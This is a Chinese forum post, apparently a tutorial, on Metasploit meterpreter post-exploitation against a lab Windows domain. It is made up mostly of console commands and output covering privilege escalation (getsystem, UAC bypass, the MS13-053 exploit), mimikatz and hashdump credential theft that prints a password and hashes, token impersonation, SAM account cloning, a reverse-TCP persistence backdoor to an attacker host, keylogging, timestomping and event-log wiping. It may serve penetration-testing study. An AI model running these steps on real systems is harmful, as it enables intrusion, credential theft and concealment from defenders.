metasploit在后渗透中的作用

-回复 -浏览
楼主 2018-10-10 15:38:20
举报 只看此人 收藏本贴 楼主

本文由脉搏作者daiker原创,跟随daiker同学扩充一下自己的武器库

0x00 前言

这里简要探究下meterpreter 的使用。meterpreter有个很有效的功能就是,除了持久化控制,其他的操作都在内存里面,不会写进物理磁盘。重启下各种痕迹就消失了

0x01 权限提升

getsystem

  1. meterpreter > getuidator

  2. meterpreter > getsystem

  3. ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).

  4. meterpreter > getuid

  5. Server username: NT AUTHORITY\SYSTEM

bypassuac

  1. meterpreter > background 

  2. Server username: TEST\Administr

  3. [*] Backgrounding session 1...

  4. msf exploit(multi/handler) > use exploit/windows/local/bypassuac

  5. msf exploit(windows/local/bypassuac) > set session 1

  6. session => 1

  7. msf exploit(windows/local/bypassuac) > exploit

  8. [*] Started reverse TCP handler on 192.168.161.138:4444

利用windows提权漏洞进行提升

  1.  meterpreter > background 

  2. [*] Backgrounding session 1...

  3. msf exploit(windows/local/bypassuac_vbs) > use post/windows/gather/enum_patches 

  4. msf post(windows/gather/enum_patches) > set session 1

  5. session => 1

  6. msf post(windows/gather/enum_patches) > exploit


  7. [+] KB2871997 is missing

  8. [+] KB2928120 is missing

  9. [+] KB977165 - Possibly vulnerable to MS10-015 kitrap0d if Windows 2K SP4 - Windows 7 (x86)

  10. [+] KB2305420 - Possibly vulnerable to MS10-092 schelevator if Vista, 7, and 2008

  11. [+] KB2592799 - Possibly vulnerable to MS11-080 afdjoinleaf if XP SP2/SP3 Win 2k3 SP2

  12. [*] KB2778930 applied

  13. [+] KB2850851 - Possibly vulnerable to MS13-053 schlamperei if x86 Win7 SP0/SP1

  14. [+] KB2870008 - Possibly vulnerable to MS13-081 track_popup_menu if x86 Windows 7 SP0/SP1

  15. [*] Post module execution completed

  16. msf post(windows/gather/enum_patches) > search MS13-053


  17. Matching Modules

  18. ================


  19.    Name                                        Disclosure Date  Rank     Description

  20.    ----                                        ---------------  ----     -----------

  21.    exploit/windows/local/ms13_053_schlamperei  2013-12-01       average  Windows NTUserMessageCall Win32k Kernel Pool Overflow (Schlamperei)

  22.    exploit/windows/local/ppr_flatten_rec       2013-05-15       average  Windows EPATHOBJ::pprFlattenRec Local Privilege Escalation



  23. msf post(windows/gather/enum_patches) > use exploit/windows/local/ms13_053_schlamperei

  24. msf exploit(windows/local/ms13_053_schlamperei) > show options


  25. Module options (exploit/windows/local/ms13_053_schlamperei):


  26.    Name     Current Setting  Required  Description

  27.    ----     ---------------  --------  -----------

  28.    SESSION                   yes       The session to run this module on.



  29. Exploit target:


  30.    Id  Name

  31.    --  ----

  32.    0   Windows 7 SP0/SP1



  33. msf exploit(windows/local/ms13_053_schlamperei) > 

  34. msf exploit(windows/local/ms13_053_schlamperei) > set session 1

  35. session => 1

  36. msf exploit(windows/local/ms13_053_schlamperei) > exploit


  37. [*] Started reverse TCP handler on 192.168.161.138:4444 

  38. [*] Launching notepad to host the exploit...

  39. [+] Process 2980 launched.

  40. [*] Reflectively injecting the exploit DLL into 2980...

  41. [*] Injecting exploit into 2980...

  42. [*] Found winlogon.exe with PID 432

  43. [+] Everything seems to have worked, cross your fingers and wait for a SYSTEM shell

  44. [*] Sending stage (179779 bytes) to 192.168.161.132

  45. [*] Meterpreter session 2 opened (192.168.161.138:4444 -> 192.168.161.132:49959) at 2018-03-19 16:56:51 +0800


  46. meterpreter > getuid

  47. Server username: NT AUTHORITY\SYSTEM

0x02 域管理员嗅探

  1. msf exploit(multi/handler) > use post/windows/gather/enum_domain

  2. msf post(windows/gather/enum_domain) > show options 


  3. Module options (post/windows/gather/enum_domain):


  4.    Name     Current Setting  Required  Description

  5.    ----     ---------------  --------  -----------

  6.    SESSION                   yes       The session to run this module on.


  7. msf post(windows/gather/enum_domain) > set session 1

  8. session => 1

  9. msf post(windows/gather/enum_domain) > exploit


  10. [+] FOUND Domain: test

  11. [+] FOUND Domain Controller: WIN-JDS94C5QEQQ (IP: 127.0.0.1)

  12. [*] Post module execution completed

  13. msf post(windows/gather/enum_domain) > exploit


  14. [+] FOUND Domain: test

  15. [+] FOUND Domain Controller: WIN-JDS94C5QEQQ (IP: 127.0.0.1)

  16. [*] Post module execution completed

0x03抓取密码

  1. meterpreter > load mimikatz 

  2. Loading extension mimikatz...Success.

  3. meterpreter > help

  4. ...

  5. Mimikatz Commands

  6. =================


  7.     Command           Description

  8.     -------           -----------

  9.     kerberos          Attempt to retrieve kerberos creds

  10.     livessp           Attempt to retrieve livessp creds

  11.     mimikatz_command  Run a custom command

  12.     msv               Attempt to retrieve msv creds (hashes)

  13.     ssp               Attempt to retrieve ssp creds

  14.     tspkg             Attempt to retrieve tspkg creds

  15.     wdigest           Attempt to retrieve wdigest creds


  16. meterpreter > wdigest 

  17. [!] Not currently running as SYSTEM

  18. [*] Attempting to getprivs

  19. [+] Got SeDebugPrivilege

  20. [*] Retrieving wdigest credentials

  21. wdigest credentials

  22. ===================


  23. AuthID    Package    Domain        User           Password

  24. ------    -------    ------        ----           --------

  25. 0;997     Negotiate  NT AUTHORITY  LOCAL SERVICE  

  26. 0;49485   NTLM                                    

  27. 0;293672  Kerberos   TEST          Administrator  TopSec_2017

  28. 0;996     Negotiate  TEST          TOPSEC$        ba 42 06 75 2b cd 83 7d ea f0 9f 4d 2e a2 03 97 eb de 0d 28 4c 5c 43 6b 64 ee bf 4e 23 75 4c 03 46 93 2c 54 70 e2 4f 0f 8b ef 34 6b 9e f2 de 5a 6f 92 7a 6e 10 0d fe 94 fc 3e 89 02 db 2e a9 ab cd 52 1e 7f 98 20 b8 cf 24 f6 1b f9 a1 b8 9c 10 e7 a4 f1 b3 16 18 5b 5a 15 b2 d3 c2 20 98 f6 b9 36 44 6c 78 39 1a ea bc 35 e6 cc cf c8 94 19 87 34 3e ff 05 b6 bb 91 8b 29 e8 55 0c c6 8d 7a 43 ab de 6d 5e a0 b7 4d 00 6a b8 d3 14 d1 53 2f 02 51 53 14 69 59 b4 9a e8 d2 ae ce 26 23 4e f6 de 6f 83 44 07 59 fa a5 82 c9 ac 57 28 88 97 6b 70 07 22 5c de 1f 8e d4 6e 14 85 62 3e 79 f0 9a f8 07 e7 84 53 ed 03 95 09 0b d4 3f 8a b2 78 e5 2e df b9 ed ff ff bd 57 71 19 74 cb d7 b7 66 fe 16 ee da 0f 8b 57 23 81 79 8b 98 62 48 8f 5d 9d 0c 

  29. 0;999     Negotiate  TEST          TOPSEC$        ba 42 06 75 2b cd 83 7d ea f0 9f 4d 2e a2 03 97 eb de 0d 28 4c 5c 43 6b 64 ee bf 4e 23 75 4c 03 46 93 2c 54 70 e2 4f 0f 8b ef 34 6b 9e f2 de 5a 6f 92 7a 6e 10 0d fe 94 fc 3e 89 02 db 2e a9 ab cd 52 1e 7f 98 20 b8 cf 24 f6 1b f9 a1 b8 9c 10 e7 a4 f1 b3 16 18 5b 5a 15 b2 d3 c2 20 98 f6 b9 36 44 6c 78 39 1a ea bc 35 e6 cc cf c8 94 19 87 34 3e ff 05 b6 bb 91 8b 29 e8 55 0c c6 8d 7a 43 ab de 6d 5e a0 b7 4d 00 6a b8 d3 14 d1 53 2f 02 51 53 14 69 59 b4 9a e8 d2 ae ce 26 23 4e f6 de 6f 83 44 07 59 fa a5 82 c9 ac 57 28 88 97 6b 70 07 22 5c de 1f 8e d4 6e 14 85 62 3e 79 f0 9a f8 07 e7 84 53 ed 03 95 09 0b d4 3f 8a b2 78 e5 2e df b9 ed ff ff bd 57 71 19 74 cb d7 b7 66 fe 16 ee da 0f 8b 57 23 81 79 8b 98 62 48 8f 5d 9d 0c

或者

  1. msf post(windows/gather/hashdump) > exploit


  2. [*] Obtaining the boot key...

  3. [*] Calculating the hboot key using SYSKEY 2739ba60d0407daf0d866cb3ee4b6b9f...

  4. [*] Obtaining the user list and keys...

  5. [*] Decrypting user keys...

  6. [*] Dumping password hints...


  7. No users with password hints on this system


  8. [*] Dumping password hashes...



  9. Administrator:500:aad3b435b51404eeaad3b435b51404ee:f013ff76154a124f8cfc32f654582420:::

  10. Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::



  11. [*] Post module execution completed

0x04假冒令牌

空格和斜杠注意转译

  1. meterpreter >  use incognito

  2. Loading extension incognito...Success.

  3. meterpreter > help

  4. ...

  5. Incognito Commands

  6. ==================


  7.     Command              Description

  8.     -------              -----------

  9.     add_group_user       Attempt to add a user to a global group with all tokens

  10.     add_localgroup_user  Attempt to add a user to a local group with all tokens

  11.     add_user             Attempt to add a user with all tokens

  12.     impersonate_token    Impersonate specified token

  13.     list_tokens          List tokens available under current user context

  14.     snarf_hashes         Snarf challenge/response hashes for every token


  15. meterpreter > list_tokens 

  16. Usage: list_tokens <list_order_option>


  17. Lists all accessible tokens and their privilege level


  18. OPTIONS:


  19.     -g        List tokens by unique groupname

  20.     -u        List tokens by unique username


  21. meterpreter > list_tokens  -u


  22. Delegation Tokens Available

  23. ========================================

  24. NT AUTHORITY\LOCAL SERVICE

  25. NT AUTHORITY\NETWORK SERVICE

  26. NT AUTHORITY\SYSTEM

  27. TEST\Administrator


  28. Impersonation Tokens Available

  29. ========================================

  30. NT AUTHORITY\ANONYMOUS LOGON


  31. meterpreter > impersonate_token NT AUTHORITY\\SYSTEM

  32. [-] User token NT not found

  33. meterpreter > impersonate_token NT\ AUTHORITY\\SYSTEM

  34. [+] Delegation token available

  35. [+] Successfully impersonated user NT AUTHORITY\SYSTEM

  36. meterpreter > getuid

  37. Server username: NT AUTHORITY\SYSTEM

0X05注册表操作

  1. meterpreter > reg -h

  2. Usage: reg [command] [options]


  3. Interact with the target machine's registry.


  4. OPTIONS:


  5.     -d <opt>  The data to store in the registry value.

  6.     -h        Help menu.

  7.     -k <opt>  The registry key path (E.g. HKLM\Software\Foo).

  8.     -r <opt>  The remote machine name to connect to (with current process credentials

  9.     -t <opt>  The registry value type (E.g. REG_SZ).

  10.     -v <opt>  The registry value name (E.g. Stuff).

  11.     -w        Set KEY_WOW64 flag, valid values [32|64].

  12. COMMANDS:


  13.     enumkey    Enumerate the supplied registry key [-k <key>]

  14.     createkey    Create the supplied registry key  [-k <key>]

  15.     deletekey    Delete the supplied registry key  [-k <key>]

  16.     queryclass Queries the class of the supplied key [-k <key>]

  17.     setval    Set a registry value [-k <key> -v <val> -d <data>]

  18.     deleteval    Delete the supplied registry value [-k <key> -v <val>]

  19.     queryval    Queries the data contents of a value [-k <key> -v <val>]

下面演示通过注册表设置开机自启动

  1. meterpreter > reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run

  2. Enumerating: HKLM\software\microsoft\windows\currentversion\run


  3.   Values (1):


  4.     VMware User Process


  5. meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v note -d 'C:\Windows\System32\notepad.exe'

  6. Successfully set note of REG_SZ.

  7. meterpreter > reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run

  8. Enumerating: HKLM\software\microsoft\windows\currentversion\run


  9.   Values (2):


  10.     VMware User Process

  11.     note


  12. meterpreter > reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v note 

  13. Key: HKLM\software\microsoft\windows\currentversion\run

  14. Name: note

  15. Type: REG_SZ

  16. Data: C:\Windows\System32\notepad.exe

  17. 下面演示怎么通过注册表复制克隆用户


  18. meterpreter > reg enumkey -k HKLM\\sam\\sam\\domains\\account\\users

  19. Enumerating: HKLM\sam\sam\domains\account\users


  20.   Keys (3):


  21.     000001F4

  22.     000001F5

  23.     Names


  24.   Values (1):




  25. meterpreter > shell

  26. Process 1884 created.

  27. Channel 1 created.

  28. Microsoft Windows [�汾 6.1.7601]

  29. ��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ����


  30. C:\windows\system32>net user guest /active:yes                

  31. net user guest /active:yes


  32. C:\windows\system32>reg copy HkLM\sam\sam\domains\account\users00001f4 HkLM\sam\sam\domains\account\users00001f5

  33. reg copy HkLM\sam\sam\domains\account\users00001f4 HkLM\sam\sam\domains\account\users00001f5

  34.  sam\sam\domains\account\users00001f4\F �Ѵ��ڣ�Ҫ������(Yes/No/All)? Yes

  35. \ֵ sam\sam\domains\account\users00001f4\V �Ѵ��ڣ�Ҫ������(Yes/No/All)?No  

  36. �����ɹ����ɡ�

0x06端口转发

  1. [*] Successfully stopped TCP relay on 0.0.0.0:3389

  2. meterpreter > portfwd add -l 3389 -p 3389 -r 192.168.161.138

  3. [*] Local TCP relay created: :3389 <-> 192.168.161.138:3389

  4. meterpreter > portfwd list


  5. Active Port Forwards

  6. ====================


  7.    Index  Local         Remote                Direction

  8.    -----  -----         ------                ---------

  9.    1      0.0.0.0:3389  192.168.161.138:3389  Forward


  10. 1 total active port forwards.

0x07搜索文件

在awd攻防赛的时候很好用

  1. meterpreter > search -f *flag*

  2. Found 3 results...

  3.     c:\flag.txt (39 bytes)

  4.     c:\Users\administrator.TEST\AppData\Roaming\Microsoft\Windows\Recent\flag.txt.lnk (477 bytes)

  5.     c:\Users\Administrator.ZGC-20160413JJL\AppData\Roaming\Microsoft\Windows\Recent\flag.txt.lnk (477 bytes)

0x08抓包

  1. meterpreter > use sniffer

  2. Loading extension sniffer...Success.

  3. meterpreter > help


  4. Sniffer Commands

  5. ================


  6.     Command             Description

  7.     -------             -----------

  8.     sniffer_dump        Retrieve captured packet data to PCAP file

  9.     sniffer_interfaces  Enumerate all sniffable network interfaces

  10.     sniffer_release     Free captured packets on a specific interface instead of downloading them

  11.     sniffer_start       Start packet capture on a specific interface

  12.     sniffer_stats       View statistics of an active capture

  13.     sniffer_stop        Stop packet capture on a specific interface


  14. meterpreter > sniffer_interfaces


  15. 1 - 'WAN Miniport (Network Monitor)' ( type:3 mtu:1514 usable:true dhcp:false wifi:false )

  16. 2 - 'Intel(R) PRO/1000 MT Network Connection' ( type:4294967295 mtu:0 usable:false dhcp:false wifi:false )

  17. 3 - 'Intel(R) PRO/1000 MT Network Connection' ( type:4294967295 mtu:0 usable:false dhcp:false wifi:false )

  18. 4 - 'Intel(R) PRO/1000 MT Network Connection' ( type:4294967295 mtu:0 usable:false dhcp:false wifi:false )

  19. 5 - 'Intel(R) PRO/1000 MT Network Connection' ( type:0 mtu:1514 usable:true dhcp:true wifi:false )


  20. meterpreter > sniffer_start 5

  21. [*] Capture started on interface 5 (50000 packet buffer)

  22. meterpreter > sniffer_dump 5 /tmp/1.pcap

  23. [*] Flushing packet capture buffer for interface 5...

  24. [*] Flushed 2540 packets (1450560 bytes)

  25. [*] Downloaded 036% (524288/1450560)...

  26. [*] Downloaded 072% (1048576/1450560)...

  27. [*] Downloaded 100% (1450560/1450560)...

  28. [*] Download completed, converting to PCAP...

  29. [*] PCAP file written to /tmp/1.pcap

  30. meterpreter > sniffer_stop 5

  31. [*] Capture stopped on interface 5

  32. [*] There are 29 packets (2263 bytes) remaining

  33. [*] Download or release them using 'sniffer_dump' or 'sniffer_release'

0x09开启3389

  1. meterpreter > run getgui -u haha -p password


  2. [!] Meterpreter scripts are deprecated. Try post/windows/manage/enable_rdp.

  3. [!] Example: run post/windows/manage/enable_rdp OPTION=value [...]

  4. [*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator

  5. [*] Carlos Perez carlos_perez@darkoperator.com

  6. [*] Setting user account for logon

  7. [*]     Adding User: haha with Password: password

  8. [*] For cleanup use command: run multi_console_command -r /root/.msf4/logs/scripts/getgui/clean_up__20180319.1815.rc

  9. meterpreter > run multi_console_command -r /root/.msf4/logs/scripts/getgui/clean

会新建个账号,并在后面删掉

0x0A改变文件时间

  1. Usage: timestomp <file(s)> OPTIONS


  2. OPTIONS:


  3.     -a <opt>  Set the "last accessed" time of the file

  4.     -b        Set the MACE timestamps so that EnCase shows blanks

  5.     -c <opt>  Set the "creation" time of the file

  6.     -e <opt>  Set the "mft entry modified" time of the file

  7.     -f <opt>  Set the MACE of attributes equal to the supplied file

  8.     -h        Help banner

  9.     -m <opt>  Set the "last written" time of the file

  10.     -r        Set the MACE timestamps recursively on a directory

  11.     -v        Display the UTC MACE values of the file

  12.     -z <opt>  Set all four attributes (MACE) of the file


  13. meterpreter > timestomp -v flag.txt

  14. [*] Showing MACE attributes for flag.txt

  15. Modified      : 2017-02-22 14:55:50 +0800

  16. Accessed      : 2017-01-11 20:53:57 +0800

  17. Created       : 2017-01-11 20:53:57 +0800

  18. Entry Modified: 2017-02-22 14:55:50 +0800

  19. meterpreter > timestomp -v 1.txt

  20. [*] Showing MACE attributes for 1.txt

  21. Modified      : 2018-03-19 20:13:36 +0800

  22. Accessed      : 2018-03-19 21:41:24 +0800

  23. Created       : 2018-03-19 21:41:24 +0800

  24. Entry Modified: 2018-03-19 21:41:24 +0800

  25. meterpreter > timestomp 1.txt -f flag.txt

  26. [*] Pulling MACE attributes from flag.txt

  27. [*] Setting specific MACE attributes on 1.txt

  28. meterpreter > timestomp -v 1.txt

  29. [*] Showing MACE attributes for 1.txt

  30. Modified      : 2017-02-22 14:55:50 +0800

  31. Accessed      : 2017-01-11 20:53:57 +0800

  32. Created       : 2017-01-11 20:53:57 +0800

  33. Entry Modified: 2017-02-22 14:55:50 +0800

0x0B日志清除

  1. meterpreter > clearev 

  2. [*] Wiping 1692 records from Application...

  3. [*] Wiping 6855 records from System...

  4. [*] Wiping 2664 records from Security...

0X0C留后门

  1. Metsvc(通过服务安装)

  1. meterpreter > run metsvc 


  2. [!] Meterpreter scripts are deprecated. Try post/windows/manage/persistence_exe.

  3. [!] Example: run post/windows/manage/persistence_exe OPTION=value [...]

  4. [*] Creating a meterpreter service on port 31337

  5. [*] Creating a temporary installation directory C:\Users\ADMINI~1.TES\AppData\Local\Temp\ENDPAzIy...

  6. [*]  >> Uploading metsrv.x86.dll...

  7. [*]  >> Uploading metsvc-server.exe...

  8. [*]  >> Uploading metsvc.exe...

  9. [*] Starting the service...

  10.      * Installing service metsvc

  11.  * Starting service

  12. Service metsvc successfully installed.

这个时候我们去连接它

  1. msf exploit(multi/handler) > set payload windows/metsvc_bind_tcp

  2. payload => windows/metsvc_bind_tcp

  3. msf exploit(multi/handler) > set rhost 192.168.161.132

  4. rhost => 192.168.161.132

  5. msf exploit(multi/handler) > set lport 31337

  6. lport => 31337

  7. msf exploit(multi/handler) > exploit


  8. [*] Started bind handler

  9. [*] 192.168.161.132 - Meterpreter session 6 closed.  Reason: Died

  10. [*] Meterpreter session 6 opened (127.0.0.1 -> 127.0.0.1) at 2018-03-19 21:37:23 +0800

  1. persistence(通过自启动安装)

  1. meterpreter > run persistence -U -i 5 -p 443 -r 192.168.161.138


  2. [!] Meterpreter scripts are deprecated. Try post/windows/manage/persistence_exe.

  3. [!] Example: run post/windows/manage/persistence_exe OPTION=value [...]

  4. [*] Running Persistence Script

  5. [*] Resource file for cleanup created at /root/.msf4/logs/persistence/TOPSEC_20180319.1312/TOPSEC_20180319.1312.rc

  6. [*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.161.138 LPORT=443

  7. [*] Persistent agent script is 99606 bytes long

  8. [+] Persistent Script written to C:\Users\ADMINI~1.TES\AppData\Local\Temp\xdoxmsHr.vbs

  9. [*] Executing script C:\Users\ADMINI~1.TES\AppData\Local\Temp\xdoxmsHr.vbs

  10. [+] Agent executed with PID 3528

  11. [*] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\jQiyGnPRxgnllmr

  12. [+] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run

然后重启试下 

  1. [*] 192.168.161.132 - Meterpreter session 4 closed.  Reason: Died

  2. msf exploit(multi/handler) > [*] Sending stage (179779 bytes) to 192.168.161.132

  3. [*] Meterpreter session 5 opened (192.168.161.138:443 -> 192.168.161.132:49169) at 2018-03-19 21:18:07 +0800


  4. msf exploit(multi/handler) > sessions -l


  5. Active sessions

  6. ===============


  7.   Id  Name  Type                     Information                  Connection

  8.   --  ----  ----                     -----------                  ----------

  9.   5         meterpreter x86/windows  TEST\Administrator @ TOPSEC  192.168.161.138:443 -> 192.168.161.132:49169 (192.168.161.132)


  10. msf exploit(multi/handler) > sessions -i 5

  11. [*] Starting interaction with 5...


  12. meterpreter >

会留一个后门,并添加进启动项

0X0D键盘记录

  1. meterpreter > keyscan_start

  2. Starting the keystroke sniffer ...

  3. meterpreter > keyscan_dump 

  4. Dumping captured keystrokes...

  5. mima<Shift><Right Shift>:12345679<^S>


  6. meterpreter > keyscan_stop

  7. Stopping the keystroke sniffer...

0X0E进程注入

  1. meterpreter > ps


  2. Process List

  3. ============


  4.  PID   PPID  Name               Arch  Session  User                          Path

  5.  ---   ----  ----               ----  -------  ----                          ----

  6.  0     0     [System Process]                                                

  7.  4     0     System             x86   0                                      

  8.  232   4     smss.exe           x86   0        NT AUTHORITY\SYSTEM           \SystemRoot\System32\smss.exe

  9.  320   312   csrss.exe          x86   0        NT AUTHORITY\SYSTEM           C:\windows\system32\csrss.exe

  10.  368   480   msdtc.exe          x86   0        NT AUTHORITY\NETWORK SERVICE  C:\windows\System32\msdtc.exe

  11.  372   312   wininit.exe        x86   0        NT AUTHORITY\SYSTEM           C:\windows\system32\wininit.exe

  12.  384   364   csrss.exe          x86   1        NT AUTHORITY\SYSTEM           C:\windows\system32\csrss.exe

  13.  432   364   winlogon.exe       x86   1        NT AUTHORITY\SYSTEM           C:\windows\system32\winlogon.exe

  14.  480   372   services.exe       x86   0        NT AUTHORITY\SYSTEM           C:\windows\system32\services.exe

  15.  488   372   lsass.exe          x86   0        NT AUTHORITY\SYSTEM           C:\windows\system32\lsass.exe

  16. ...

  17. meterpreter > migrate 3104

  18. [*] Migrating to 3104

0x0F 截屏


  1. eterpreter > use espia

  2. Loading extension espia...Success.

  3. meterpreter > screen

  4. screengrab  screenshot  

  5. meterpreter > screengrab 

  6. Screenshot saved to: /home/daiker/zQBKZbTv.jpeg

我要推荐
转发到